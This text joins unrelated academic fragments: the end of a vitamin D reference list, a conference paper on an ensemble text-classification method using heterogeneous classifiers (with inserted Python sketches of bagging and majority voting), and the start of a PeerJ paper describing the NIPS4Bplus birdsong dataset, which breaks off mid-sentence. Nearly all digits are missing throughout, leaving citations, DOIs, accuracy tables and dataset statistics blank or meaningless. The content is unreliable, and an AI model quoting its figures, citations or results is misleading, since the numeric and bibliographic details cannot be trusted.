rocha dac, szejnfeld j & castro chm. vitamin d deficiency and seasonal variation over the years in são paulo, brazil. osteoporosis international – . (https://doi.org/ . /s - - -z) fang f, wei h, wang k, tan l, zhang w, ding l, liu t, shan z & zhu m. high prevalence of vitamin d deficiency and influencing factors among urban and rural residents in tianjin, china. archives of osteoporosis . (https://doi.org/ . /s - - - ) choi hs, oh hj, choi h, choi wh, kim jg, kim km, kim kj, rhee y & lim sk. vitamin d insufficiency in korea – a greater threat to younger generation: the korea national health and nutrition examination survey (knhanes) . journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) chen j, yun c, he y, piao j, yang l & yang x. 
vitamin d status among the elderly chinese population: a cross-sectional analysis of the – china national nutrition and health survey (cnnhs). nutrition journal . (https://doi.org/ . /s - - - . nurbazlin m, chee wss, rokiah p, alexander at, chew yy, nusaibah ars & chan sp. effects of sun exposure on (oh) vitamin d concentration in urban and rural women in malaysia. asia pacific journal of clinical nutrition – . (https://doi. org/ . /apjcn. . . . ) heere c, skeaff cm, waqatakirewa l, vatucawaqa p, khan an & green tj. serum -hydroxyvitamin d concentration of indigenous- fijian and fijian-indian women. asia pacific journal of clinical nutrition – . g r & gupta a. vitamin d deficiency in india: prevalence, causalities and interventions. nutrients – . (https://doi. org/ . /nu ) kimlin mg, lucas rm, harrison sl, van der mei i, armstrong bk, whiteman dc, kricker a, nowak m, brodie am & sun j. the contributions of solar ultraviolet radiation exposure and other
) mezzavilla m, tomei s, alkayal f, melhem m, ali mm, al-arouj m, bennakhi a, alsmadi o & elkum n. investigation of genetic variation and lifestyle determinants in vitamin d levels in arab individuals. journal of translational medicine . (https://doi.org/ . / s - - - ) uitterlinden ag, fang y, van meurs jbj, pols hap & van leeuwen jptm. genetics and biology of vitamin d receptor polymorphisms. gene – . (https://doi.org/ . /j.gene. . . ) jiang x, kiel dp & kraft p. the genetics of vitamin d. bone – . (https://doi.org/ . /j.bone. . . ) nissen j, rasmussen lb, ravn-haren g, andersen ew, hansen b, andersen r, mejborn h, madsen kh & vogel u. common variants in cyp r and gc genes predict vitamin d concentrations in healthy danish children and adults. plos one e . (https://doi. org/ . /journal.pone. ) husain ne, badie suliman aa, abdelrahman i, bedri sa, musa rm, osman he, mustafa ah, gafer n, farah e, satir aa, et al. vitamin d level and its determinants among sudanese women: does it matter in a sunshine african country? journal of family medicine and primary care – . (https://doi.org/ . /jfmpc. jfmpc_ _ ) dirks nf, ackermans mt, lips p, de jongh rt, vervloet mg, de jonge r & heijboer ac. the when, what and how of measuring vitamin d metabolism in clinical medicine. nutrients . (https://doi.org/ . /nu . ferreira ce. consensus – reference ranges of vitamin d [ (oh)d] from the brazilian medical societies. brazilian society of clinical pathology/laboratory medicine (sbpc/ml) and brazilian society of endocrinology and metabolism (sbem). jornal brasileiro de patologia e medicina laboratorial – . filgueiras ms, suhett lg, silva ma, rocha np & de novaes jf. lower vitamin d intake is associated with low hdl cholesterol and vitamin d insufficiency/deficiency in brazilian children. public health nutrition – . (https://doi.org/ . / s ) peters bse, dos santos lc, fisberg m, wood rj & martini la. prevalence of vitamin d insufficiency in brazilian adolescents. annals of nutrition and metabolism – . (https://doi. org/ . / ) cembranel f, hallal alc, gonzález-chica da & d’orsi e. relação entre consumo alimentar de vitaminas e minerais, índice de massa corporal e circunferência da cintura: um estudo de base populacional com adultos no sul do brasil. cadernos de saúde pública e . (https://doi.org/ . / - x ) fisberg rm, marchioni dml, de castro ma, verly junior e, araújo mc, bezerra in, pereira ra & sichieri r. ingestão inadequada de nutrientes na população de idosos do brasil: inquérito nacional de alimentação – . revista de saúde pública (supplement ) s– s. (https://doi.org/ . /s - ) libon f, cavalier e & nikkels af. skin color is relevant to vitamin d synthesis. dermatology – . (https://doi. org/ . / ) xiang f, lucas r, de gruijl f & norval m. a systematic review of the influence of skin pigmentation on changes in the concentrations of vitamin d and -hydroxyvitamin d in plasma/serum following experimental uv irradiation. photochemical and photobiological sciences – . (https://doi.org/ . / c pp d) brazilian institute of geography and statistics. table – resident population by color or race and religion. rio de janeiro, brazil: ibge. (available at: https://sidra.ibge.gov.br/tabela/ #/n /all/n /all/ n /all/v/ /p/last% /c /allxt/c / /d/v % /l/v,p+c ,t+c /resultado) munns cf, shaw n, kiely m, specker bl, thacher td, ozono k, michigami t, tiosano d, mughal mz, mäkitie o, et al. global consensus recommendations on prevention and management of nutritional rickets. journal of clinical endocrinology and metabolism – . 
(https://doi.org/ . /jc. - )

international conference on sensor network and computer engineering (icsnce )

an ensemble learning method for text classification based on heterogeneous classifiers

fan huimin, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: @ qq.com
li pengpeng, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: m @ .com
zhao yingze, school of marxism, xi'an jiaotong university, xi'an, china, e-mail: yingze @ .com
li danyang, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: @qq.com

abstract—ensemble learning can improve the accuracy of the classification algorithm and it has been widely used. traditional ensemble learning methods include bagging, boosting and other methods, both of which are ensemble learning methods based on homogenous base classifiers, and obtain a diversity of base classifiers only through sample perturbation. however, heterogenous base classifiers tend to be more diverse, and multi-angle disturbances tend to obtain a variety of base classifiers. this paper presents a text classification ensemble learning method based on multi-angle perturbation heterogeneous base classifier, and validates the effectiveness of the algorithm through experiments.

keywords-machine learning; ensemble learning; text classification

i. introduction
the main idea of ensemble learning is to generate multiple learners through certain rules and then adopt some integrated strategy to make the final decision[ ]. in general, multiple learners in the so-called ensemble learning are all homogenous "weak learners".
based on these weak learners, multiple learners are generated through sample set perturbation, and a strong learner is obtained after integration. with the deepening of integrated learning, its broad definition gradually accepted by scholars. it refers to a collection of multiple classifiers using learning methods, without distinction between the nature of the classifier。 however, the research of ensemble learning with homogenous classifiers is still the most common, and it is usually only perturbed by a single angle such as algorithm training set[ ][ ]. the random forest algorithm adds the perturbation of the classification attribute to the traditional bagging algorithm, and thus obtains a better classification effect[ ]. this shows that the multi-angle perturbation can produce a larger difference base learner, and the ensemble learning model has higher classification accuracy. in addition, the research shows that the diversity of base learners based on the heterogeneous base classifier is stronger, so the classification model has stronger classification accuracy and generalization performance[ ][ ]. therefore, this paper combines the above two factors and designs a text classification ensemble learning method based on multi-angle perturbation heterogeneous base classifier. international conference on sensor network and computer engineering (icsnce ) ii. ensemble learning "weak learning is equivalent to strong learning" is a theoretical issue raised by kearns and valiant in . the boosting algorithm arises from the proof of this issue. then the boosting algorithm derived a number of variants, including gradient boosting, lpboosting and so on. because of the characteristics of boosting that training classifiers serially, the training process takes up more resources and has lower efficiency. therefore, whether it is possible to use a few classifiers and obtain the same performance is a matter of concern to researchers. zhou zhihua and others on the "selective ensemble"[ ][ ] of boosting algorithm helped to overcome this problem. "selective ensemble" only used the classifier with has good classification results to integrate the classifiers. this idea can finish the construction of ensembled model more efficiently without changing the original algorithm that training base classifiers. in recent years, a method of selective integration based on clustering, selection, optimization and other methods has also been developed. the theoretical basis of ensemble learning shows that strongly learner and weak learner are equivalent, so we can find ways to convert weaker learners into strongly learners, without having to look for hard-to-find learner. currently there is a representative ensemble learning method boosting, bagging. the traditional bagging algorithm and boosting algorithm as well as many derived algorithms of the two algorithms are ensemble learning based on homogenous base classifier. and diversity is only obtained through sample disturbances, while multi-angle disturbances and heterogeneous classifiers can improve model classification accuracy. this paper first trains and integrates homogenous base classifiers, compares and analyzes changes in the accuracy of base classifiers and integrated models, and then integrates k-nearest neighbor classifiers, bayesian classifiers, and logistic regression classifiers in text classifiers. 
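for reference, the sample-perturbation baseline discussed above (traditional bagging with a homogenous base classifier and majority voting) can be sketched as follows. this is only an illustrative sketch assuming scikit-learn components and numpy-style inputs, not the exact implementation used in the paper.

```python
import numpy as np
from sklearn.base import clone
from sklearn.naive_bayes import MultinomialNB

def bagging_fit(base_estimator, X, y, n_estimators=10, seed=0):
    """train n_estimators copies of the same (homogenous) base classifier,
    each on a bootstrap resample of the training set (X: array or sparse
    matrix, y: integer-encoded numpy array)."""
    rng = np.random.default_rng(seed)
    n = X.shape[0]
    models = []
    for _ in range(n_estimators):
        idx = rng.integers(0, n, size=n)   # sample perturbation: n rows drawn with replacement
        models.append(clone(base_estimator).fit(X[idx], y[idx]))
    return models

def bagging_predict(models, X):
    """combine the base classifiers by majority vote."""
    votes = np.stack([m.predict(X) for m in models])
    return np.apply_along_axis(lambda col: np.bincount(col).argmax(), 0, votes)

# usage (illustrative): X_train would be a vectorised text matrix, y_train integer labels
# models = bagging_fit(MultinomialNB(), X_train, y_train, n_estimators=15)
# y_pred = bagging_predict(models, X_test)
```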
the integration model of the heterogeneous base classifier compares the diversity with the base classifier homogenous bagging algorithm to measure the kw value and accuracy. iii. ensemble learning model based on heterogeneous base classifier in order to obtain an integrated learning model with higher accuracy, more base classifiers with more diversity and good classification results should be obtained as much as possible. from the perspective of diversity, we can try to select a combination of many "attributes" from the variable factors in the classification process. here, "attribute" refers to everything that causes the change of the algorithm classification result. from the general process of text classification analysis, feature selection, feature dimension, classifier selection and classifier parameters can be used as a basis for the diversity of the classifier. for each classification model, its algorithm parameters, feature selection algorithm, feature dimension are disturbed. in this paper, many kinds of classifiers are integrated, and an integrated learning model based on multi-angle perturbation heterogeneous basis classifiers is designed. inputs in the process of model training are feature selection algorithm set s, feature dimension set n, classifier set c, adjustable parameter set a and parameter optional value set (dictionary) v. training steps are as follows: step : pre-process the sample set. step : select an algorithm for each feature, make a feature selection for each feature dimension, and add the feature selection result to the feature selection result list l. step : perform step for each classifier. step : train and save to the classifier list c-output for each parameter of the classifier in combination with eachresult in the l list. the output of the model is the classifier list c-output. the testing process of the model is as follows: after the pre-processing and the vectorization of the sample to be tested, a series of classification models are used to predict the samples to obtain a plurality of classification results. the majority of voting integration strategies lead to the final classification result. the feature selection algorithm, feature dimension, and classifier all serve as a source for the diversity of the base classifiers. in this paper, feature selection algorithm can use chi-square statistics, information gain and mutual international conference on sensor network and computer engineering (icsnce ) information algorithm. classifier perturbation can be trained by bayesian classifier, k-nearest neighbor classifier and logistic regression classifier. since the parameters of the classifier are also variables, they can also be used as disturbance variables. iv. experiment analysis the experiment uses sogou labs' entire network news dataset, and randomly selects news documents from five categories of financial, education, automotive, entertainment and women, and uses the body part and its category markers as the experimental text data set (balanced data set). the experiment will use % data as the training set and the rest as test sets. a. the impact of changes in featuredimensions. figure . experiment on the variation of feature dimension between integrated model and single classifier model with the increase of feature dimensions, the accuracy of each model is on the rise. when the number of features is small, the accuracy of the integrated model is only lower than that of the information gain algorithm. 
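before turning to the parameter perturbations, the combinatorial training loop in steps above can be sketched as follows. this is a minimal illustration assuming scikit-learn equivalents: chi-square and mutual information selectors stand in for the paper's chi-square/information gain/mutual information set (information gain has no direct scikit-learn scorer), and the feature dimensions and classifier parameters are placeholders rather than the settings used in the paper.

```python
import numpy as np
from sklearn.base import clone
from sklearn.feature_selection import SelectKBest, chi2, mutual_info_classif
from sklearn.naive_bayes import MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# perturbation sources (illustrative placeholders, not the paper's exact settings)
SELECTORS = {"chi2": chi2, "mutual_info": mutual_info_classif}   # feature selection set S
DIMENSIONS = [500, 1000, 2000]                                    # feature dimension set N
CLASSIFIERS = [MultinomialNB(),
               KNeighborsClassifier(n_neighbors=5),
               LogisticRegression(max_iter=1000)]                 # classifier set C

def train_ensemble(X, y):
    """steps 2-4: train one base model per (selector, dimension, classifier) combination."""
    models = []
    for score_fn in SELECTORS.values():
        for k in DIMENSIONS:
            for clf in CLASSIFIERS:
                pipe = make_pipeline(SelectKBest(score_fn, k=k), clone(clf))
                models.append(pipe.fit(X, y))
    return models

def predict_majority(models, X):
    """testing: every base model predicts, and the majority vote gives the final
    label (labels are assumed to be integer-encoded)."""
    votes = np.stack([m.predict(X) for m in models])
    return np.apply_along_axis(lambda col: np.bincount(col).argmax(), 0, votes)
```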
when the number of features exceeds , the integrated model performs best. it can be seen that the classification effect of the integrated model is not always better than that of a single classifier. when the feature dimension is small, the accuracy of the integrated model is lower than that of the information gain algorithm model. in the experimental results obtained from experimental data in this paper, when the feature dimension exceeds dimensions, the accuracy of the model tends to be stable, and the accuracy of ensemble learning model is always higher than that of a single classifier model. b. the effect of feature selection algorithm and classifiers table i. experiment ofthe perturbation of feature selection algorithm type feature selection algorithm classifier accuracy/% base classifier chi knn . ig . mi . ensembleclassifier above three kinds . base classifier chi bayesian . ig . mi . ensembleclassifier above three kinds . base classifier chi logistic regression . ig . mi . ensembleclassifier above three kinds . it can be seen from the experimental results that under the same conditions, the classification results of multiple classifiers combined with multiple feature selection algorithms are quite different. that is to say, the diversity between the base classifiers obtained by the perturbation feature selection algorithm is strong. therefore, a variety of feature selection algorithms can be used as one of the sources of the base classifiers. as can be seen from table , when the feature selection algorithm is chi-square statistics, information gain or mutual information algorithm, the classification accuracy of the single classifier is lower, and the accuracy of the integrated classifier classification is higher than that of any single classifier. the disturbance of classifier makes the algorithm vary greatly in accuracy, so the disturbance of classifier can also be used as one of the sources of the diversity of classifier. c. effect of classifier parameters due to the different settings of the base classifier parameters will lead to some differences between the training model, this paper designed experiments to further examine the accuracy of the basic learning model in the international conference on sensor network and computer engineering (icsnce ) disturbance of classifier parameters. the experimental results are shown in table - . table ii. parameter perturbation experiment of k nearest neighbor classifier type k classifier accuracy/% base classifier knn . . . . . ensemble classifier - - . table iii. perturbation experiment of bayesian classifier parameter type type of classifier classifier accuracy/% base classifier polynomial bayesian classifier . gaussian bernoulli . ensemble classifier - - . table iv. perturbation experiment of logistic regression classifier parameter type the way of classification loss function optimization method classifier accur acy/% base classifier one to many liblinear logistic regressio n . newton-cg . lbfgs . sag . multi-category newton-cg . lbfgs . sag . ensemble classifier - - - . from the data in table - found: compared with the above three groups of experiments, the k-nearest neighbor classifier has a strong diversity among the classifiers in the selection of "k value" and the bayesian classifier perturbation of the "classifier type" parameters. therefore, base classifiers with higher classification accuracy are candidates. 
however, the logistic regression classifier is insensitive to the two parameters of "classification method" and "loss function optimization method". the accuracy of the base classifier is almost constant and the diversity is lower. in the multi-angle perturbation integrated model, only one of the classifiers can be selected. d. multi-angle disturbance through the above three groups of experiments, we have screened the selected parameters of the base classifier with strong diversity. from the experimental data obtained from the above three experiments, the kw diversity measure between homogeneity classifiers that make up each classifier can be calculated as shown in table . table v. base classifier diversity measure kw value ensemble learning model disturb variable kw value knn feature selection algorithm . bayesian classifier . logistic regression classifier . chi classifier . ig . mi . knn k value . bayesian classifier classifier type . logistic regression classifier classification and optimization methods multiangle perturbation heterogeneous basis classifier multi-angle disturbance . the range of kw values is [ , ]. when kw is or , the base classifiers are the same, and there is no diversity among base classifiers. when kw is . , the base classifier has the highest diversity. as can be seen from table , the integrated models with the most diversity of base classifiers in table are all based on heterogeneous base classifiers. the kw value of this model is better than that based on the rest of the integrated learning models. international conference on sensor network and computer engineering (icsnce ) using the integrated method, the above feature selection algorithm, feature dimension, classifier and its parameters are taken as input to integrate all the base classifiers, and an integrated model based on multi-angle perturbation heterogeneous base classifiers is obtained. the multi-angle disturbance integrated learning model parameters are summarized in table . table vi. model parameters variable value / classifier classifier property value feature selection algorithm chi、ig、mi - characteristic dimension 、 、 - classifier bayesian classifier type: gaussian, bernoulli, polynomial classifier knn k= 、 、 classifier logistic regression classifier classification: one to many; optimization methods: sag the parameters shown in table are used as inputs to the model to train the integrated learning model designed in this paper. compare this model with the bagging text classification model with only sample perturbation. the experimental results are shown in table . table vii. the comparison between the model and bagging model model type variable classifier kw value accuracy/% bagging sample disturbance knn . bagging sample disturbance bayesian . . bagging sample disturbance logistic regression . heterogeneous classifier model multi-angle disturbance - . the experimental results show that the bagging algorithm based on k-nearest neighbor classifier has higher kw value, that is to say, the classifier has strong diversity but low accuracy. bagging algorithm based on bayesian classifier and logistic regression classifier has low kw value and accuracy, that is, the base classifier has less diversity and low accuracy. the integrated learning model based on multi-angle disturbance heterogeneous basis classifier designed in this paper has the highest classification accuracy and the strong diversity of base classifiers. v. 
conclusion this paper analyzes the algorithmic process of bagging and boosting, and finds that both of them are integrated learning strategies based on homogeneity classifier. at present, the research on heterogeneous base classifier integrated learning is less. in this paper, we design a learning model of multi-angle perturbation heterogeneous basis classifier. multi-angle perturbation of heterogeneous classifiers, and try to integrate them. the experimental results show that the integrated learning model based on multi-angle perturbation-based heterogeneous base classifiers proposed and designed in this paper has higher classification accuracy and rich base classifier diversity. this will provide an important basis for further research on heterogeneous classifier integration. references [ ] lai j h. ensemble learning for text classification[j]. . [ ] wang g, sun j, ma j, et al. sentiment classification: the contribution of ensemble learning[j]. decision support systems, , : - . [ ] xia r, zong c, li s. ensemble of feature sets and classification algorithms for sentiment classification[j]. information sciences, , ( ): - . [ ] jia j, liu z, xiao x, et al. psuc-lys: predict lysine succinylation sites in proteins with pseaac and ensemble random forest approach[j]. journal of theoretical biology, , : - . [ ] rodriguez j j, kuncheva l i, alonso c j. rotation forest: a new classifier ensemble method[j]. ieee transactions on pattern analysis and machine intelligence, , ( ): - . [ ] wu z, lin w, zhang z, et al. an ensemble random forest algorithm for insurance big data analysis[c]//computational science and engineering (cse) and embedded and ubiquitous computing (euc), ieee international conference on. ieee, , : - . [ ] li n, jiang y, zhou z h. multi-label selective ensemble[c]//international workshop on multiple classifier systems. springer, cham, : - . [ ] qian c, yu y, zhou z h. pareto ensemble pruning[c]//aaai. : - . submitted may accepted august published october corresponding author veronica morfi, g.v.morfi@qmul.ac.uk academic editor shawn gomez additional information and declarations can be found on page doi . /peerj-cs. copyright morfi et al. distributed under creative commons cc-by . open access nips bplus: a richly annotated birdsong audio dataset veronica morfi , yves bas , , hanna pamuła , hervé glotin and dan stowell machine listening lab, centre for digital music (c dm), department of electronic engineering and computer science, queen mary university of london, london, united kingdom centre d’ecologie et des sciences de la conservation (cesco), muséum national d’histoire naturelle, cnrs, sorbonne université, paris, france centre d’ecologie fonctionnelle et evolutive (cefe), cnrs, université de montpellier, université paul-valéry montpellier, montpellier, france department of mechanics and vibroacoustics, agh university of science and technology, kraków, poland cnrs, lis, dyni team, sabiod, université de toulon (utln), aix marseille université (amu), marseille, france abstract recent advances in birdsong detection and classification have approached a limit due to the lack of fully annotated recordings. in this paper, we present nips bplus, the first richly annotated birdsong audio dataset, that is comprised of recordings containing bird vocalisations along with their active species tags plus the temporal annotations acquired for them. statistical information about the recordings, their species specific tags and their temporal annotations are presented along with example uses. 
nips bplus could be used in various ecoacoustic tasks, such as training models for bird population monitoring, species classification, birdsong vocalisation detection and classification. subjects bioinformatics, computational biology, data mining and machine learning, databases, multimedia keywords audio dataset, bird vocalisations, ecosystems, ecoacoustics, rich annotations, bioinformatics, audio signal processing, bioacoustics introduction the potential applications of automatic species detection and classification of birds from their sounds are many (e.g., ecological research, biodiversity monitoring, archival) (dawson & efford, ; lambert & mcdonald, ; drake et al., ; sovern et al., ; marques et al., ). in recent decades, there has been an increasing amount of ecological audio datasets that have tags assigned to them to indicate the presence or not of a specific bird species. utilising these datasets and the provided tags, many authors have proposed methods for bird audio detection (adavanne et al., ; pellegrini, ) and bird species classification, e.g., in the context of lifeclef classification challenges (goëau et al., ; goëau et al., ) and more (salamon & bello, ; knight et al., ). however, these methods do not predict any information about the temporal location of each event or the number of its occurrences in a recording. some research has been made into using audio tags in order to predict temporal annotations, labels that contain temporal information about the audio events. this is usually done in a multi-instance learning (mil) or weakly supervised learning setting. in (briggs et al., ; ruiz-muñoz, orozco-alzate & castellanos-dominguez, ), the how to cite this article morfi v, bas y, pamuła h, glotin h, stowell d. . nips bplus: a richly annotated birdsong audio dataset. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mailto:g.v.morfi@qmul.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. authors try to exploit audio tags in birdsong detection and bird species classification, in (fanioudakis & potamitis, ), the authors use deep networks to tag the temporal location of active bird vocalisations, while in (roger et al., ), the authors propose a bioacoustic segmentation based on the hierarchical dirichlet process (hdp-hmm) to infer song units in birdsong recordings. furthermore, some methods for temporal predictions by using tags have been proposed for other types of general audio (schlüter, ; adavanne & virtanen, ; kumar & raj, ). however, in all the above cases some kind of temporal annotations were used in order to evaluate the performance of the methods. hence, acquiring temporal annotations is vital even for methods that are in a weakly supervised learning setting. in the field of automatic birdsong monitoring, advances in birdsong detection and classification have approached a limit due to the lack of fully annotated datasets. annotating ecological data with temporal annotations to train sound event detectors and classifiers is a time consuming task involving a lot of manual labour and expert annotators. there is a high diversity of animal vocalisations, both in the types of the basic syllables and in the way they are combined (s. brandes, ; kroodsma, ). 
also, there is noise present in most habitats, and many bird communities contain multiple bird species that can potentially have overlapping vocalizations (luther, ; luther & wiley, ; pacifici, simons & pollock, ). these factors make detailed annotations laborious to gather, while on the other hand acquiring audio tags takes much less time and effort, since the annotator has to only mark the active sound event classes in a recording and not their exact boundaries. this means that many ecological datasets lack temporal annotations of bird vocalisations even though they are vital to the training of automated methods that predict the temporal annotations which could potentially solve the issue of needing a human annotator. recently, birdvox-full-night (lostanlen et al., ), a dataset containing some temporal and frequency information about flight calls of nocturnally migrating birds, was released. however, birdvox-full-night only focuses on avian flight calls, a specific type of bird calls, that usually have a very short duration in time. the temporal annotations provided for them do not include any onset, offset or information about the duration of the calls, they simply contain a single time marker at which the flight call is active. additionally, there is no distinction between the different bird species, hence no specific species annotations are provided, but only the presence of flight calls through the duration of a recording is denoted. hence, the dataset can provide data to train models for flight call detection but is not efficient for models performing both event detection and classification for a variety of bird vocalisations. in this paper, we introduce nips bplus, the first ecological audio dataset that contains bird species tags and temporal annotations. nips bplus contains temporal annotations for the recordings that comprised the training set of the neural information processing scaled for bioacoustics (nips b) challenge for bird song classification (http://sabiod.univ-tln.fr/nips b/challenge .html) that are accessible at figshare (https://doi.org/ . /m .figshare. ) (morfi, stowell & pamuła, ). nips bplus can be used for training supervised automated methods that perform bird morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://sabiod.univ-tln.fr/nips b/challenge .html https://doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. table some of the latest and most frequently used datasets in tasks related to bird song classification and detection. #recs denotes the num- ber of recordings in the dataset; #classes denotes the numbers of classes in each dataset; species tags indicates if there are species specific labels in the recordings stating the presence of specific species in them; annotations denotes the presence of temporal annotations in recordings; duration de- notes the approximate duration of each dataset in hours; and other info provides additional information about the characteristics of the dataset. 
dataset name #recs #classes species tags annotations duration other info nips bplus yes yes h freefield , n/a no no h bird/no-bird tags warblrb k , n/a no no h bird/no-bird tags birdvox-dcase- k , n/a no no h bird/no-bird tags chernobyl , n/a no no h bird/no-bird tags polandnfc , n/a no no h bird/no-bird tags lifeclef(birdclef) , yes no h from xeno-canto lifeclef(birdclef) , yes no h from xeno-canto birdvox-full-night no yes h points in time vocalisation detection and classification and can also be used for evaluating methods that use only audio tags or no annotations for training. table presents an overview comparison between nips plus and the most recent and frequently used datasets in tasks related to bird vocalisation classification and detection. during the detection and classifiaction of acoustic scenes and events, the (dcase) challenge the freefield , warblrb k, birdvox-dcase- k (deriving from birdvox-full-night (https://wp.nyu.edu/birdvox/birdvox-full-night/)), chernobyl and polandnfc datasets were used in task for bird audio detection, namely detecting the presence of any bird in a recording and assigning a file format with the presence of any bird in a recording and assigning a binary label ( :bird, :no-bird) to it (http://dcase.community/challenge /task-bird-audio-detection). another very widely known challenge that addresses the task of active bird species identification in a recording is birdclef, which has been part of the lifeclef challenge since (https://www.imageclef.org/lifeclef ). finally, birdvox-full-night presented in (lostanlen et al., ), is a dataset of ten hours of night calls annotated as single points in time instead of continuous events, due to the short duration of night calls in the dataset. the datasets used in birdclef derive from xeno-canto, the largest publicly available bird sound database, that contains over , recordings of more than , different bird species (https://www.xeno-canto.org/). another bird sound database presented in (arriaga et al., ), that has been open to the public since , is bird- db (http://taylor .biology.ucla.edu/birddbquery/). bird-db consists of more than recordings from over different bird species. in contrast to xeno-canto that only provides tags of the recordings with the bird species present in it, the recordings in bird-db include temporal annotations identifying the bird species and also classifying the vocalisation. even though bird-db provides temporal annotation, it is meant to be used as a database and is not very convenient as a dataset. this is mainly due to the fact that any user can upload recordings and their annotations, additionally, each recording and annotation pair needs to be downloaded separately. morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://wp.nyu.edu/birdvox/birdvox-full-night/ http://dcase.community/challenge /task-bird-audio-detection https://www.imageclef.org/lifeclef https://www.xeno-canto.org/ http://taylor .biology.ucla.edu/birddbquery/ http://dx.doi.org/ . /peerj-cs. the rest of the paper is structured as follows: audio data collection describes the process of collecting and selecting the recordings comprising the dataset, annotations presents our approach of acquiring the tags and temporal annotations and provides statistical information about the labels and recordings comprising the dataset followed by example uses of nips bplus and conclusion. 
audio data collection the recordings that comprise the nips b training and testing dataset were collected by recorders placed in different locations, which can be summarised by seven regions in france and spain. twenty percent of the recordings were collected from the haute-loire region in central france, % of them were collected from the pyrénées-orientales, aude and hérault regions in south-central france along the mediterranean cost and the remaining % of the recordings originated from the granada, jaén and almeria regions in eastern andalusia, spain. the haute-loire area is a more hilly and cold region, while the rest of the regions are mostly along the mediterranean coast and have a more mediterranean climate. the recorders used were the sm bat (https://bit.ly/ rbf cd) using smx-us microphones (https://www.wildlifeacoustics.com/images/pdfs/ultrasonicmicrophones. pdf), both produced by wildlife acoustics (https://www.wildlifeacoustics.com/). they were originally put in the field for bat echolocation call sampling, but they were also set to record for h single channel at . khz sampling rate starting min after sunrise, right after bat sampling. the recorders were set to a db signal-to-noise ratio (snr) trigger with a window of s, and acquired recordings only when the trigger was activated. approximately h of field recordings were collected. any recording longer than s was split into multiple s files. sonochiro, a chirp detection tool used for bat vocalisation detection, was used on each file to identify recordings with bird vocalisations (http://www.leclub-biotope.com/fr/ -sonochiro). a stratified random sampling was then applied to all acquired recordings, based on locations and clustering of features, to maximise the diversity in the labelled dataset, resulting in nearly , files being chosen. following the first stage of selection, manual annotations were produced for the classes active in these , files and any recordings that contained unidentified species’ vocalisations were discarded. furthermore, the training set and testing set recordings were allocated so that the same species were active in both. finally, for training purposes, only species that could be covered by at least seven recordings in the training set were included in the final dataset, the rest were considered rare species’ occurrences that would make it hard to train any classifier; hence, they were discarded. the final training and testing set consist of files of total duration of less than an hour, and , files of total duration of nearly two hours, respectively. morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://bit.ly/ rbf cd https://www.wildlifeacoustics.com/images/pdfs/ultrasonicmicrophones.pdf https://www.wildlifeacoustics.com/images/pdfs/ultrasonicmicrophones.pdf https://www.wildlifeacoustics.com/ http://www.leclub-biotope.com/fr/ -sonochiro http://dx.doi.org/ . /peerj-cs. figure label occurrences on different regions. number of occurrences of each sound type in record- ings collected from spain, southern france and central france. full-size doi: . /peerjcs. /fig- annotations tags the labels for the species active in each recording of the training set were initially created for the nips b bird song classification challenge (glotin et al., ). there is a total of different bird species active in the dataset. for some species we discriminate the song from the call and from the drum. we also include some species living with these birds: nine insects and an amphibian. 
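as a small aside on the collection pipeline described above, splitting long triggered recordings into fixed-length files is straightforward to reproduce. the snippet below is an illustrative sketch only; the segment length, file naming and the mono down-mixing guard are placeholder assumptions rather than the exact settings used for nips b, and it assumes the soundfile package.

```python
# illustrative sketch: split a long field recording into fixed-length segments.
# segment length and file names are placeholders, not the nips4b settings.
import numpy as np
import soundfile as sf

def split_recording(path, out_prefix, segment_seconds=5.0):
    audio, sr = sf.read(path)
    if audio.ndim > 1:                      # keep a single channel if stereo
        audio = audio.mean(axis=1)
    seg_len = int(segment_seconds * sr)
    n_segments = int(np.ceil(len(audio) / seg_len))
    for i in range(n_segments):
        chunk = audio[i * seg_len:(i + 1) * seg_len]
        sf.write(f"{out_prefix}_{i:03d}.wav", chunk, sr)
    return n_segments

# example: split_recording("site01_dawn.wav", "site01_dawn", segment_seconds=5.0)
```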
this tagging process resulted in classes. a detailed list of the class names and their corresponding species english and scientific names can be found in (morfi, stowell & pamuła, ). these tags only provide information about the species active in a recording and do not include any temporal information. in addition to the recordings containing bird vocalisations, some training files only contain background noise acquired from the same regions and have no bird song in them, these files can be used to tune a model during training. figure depicts the number of occurrences per class for recordings collected in each of the three different general regions of spain, south france and central france. each tag is represented by at least seven up to a maximum of recordings. each recording that contains bird vocalisations includes one to six individual labels. these files may contain different vocalisations from the same species and also may contain a variety of other species that vocalise along with this species. figure depicts the distribution of the number of active classes in the dataset. figure depicts the number of co-occurrences between pairs of labels. we can notice that there are no notable patterns to the ways species vocalisations co-occur. one interesting thing one can notice while studying the co-occurrence heat map is that there is no strong correlation between calls and songs from the same species, this is due to the different functions between calls and songs produced. as calls may be related to self-maintenance activities such as species identification or holding the flock together, while songs are mostly used for attracting a mate, establishing territories, intimidating enemies and learning through imitations and practising. temporal annotations temporal annotations for each recording in the training set of the nips b dataset were produced manually using sonic visualiser (https://www.sonicvisualiser.org/). the temporal morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://www.sonicvisualiser.org/ http://dx.doi.org/ . /peerj-cs. figure number of active classes throughout the dataset. distribution of number of active classes in dataset recordings. full-size doi: . /peerjcs. /fig- annotations were made by a single annotator, hanna pamuła, and can be found in (morfi, stowell & pamuła, ). table presents the temporal annotation format as is provided in nips bplus. in fig. we present the mean duration for every class activation in all the recordings. most classes have a brief duration of less than . s, with most of the insect classes (marked with red bars) having a longer duration. finally, in fig. we report the total number of activations for each class in the dataset, with the minimum being and the maximum being . in concern to the temporal annotations for the dataset, we should mention the following: • the original tags were used for guidance; however, some files were judged to 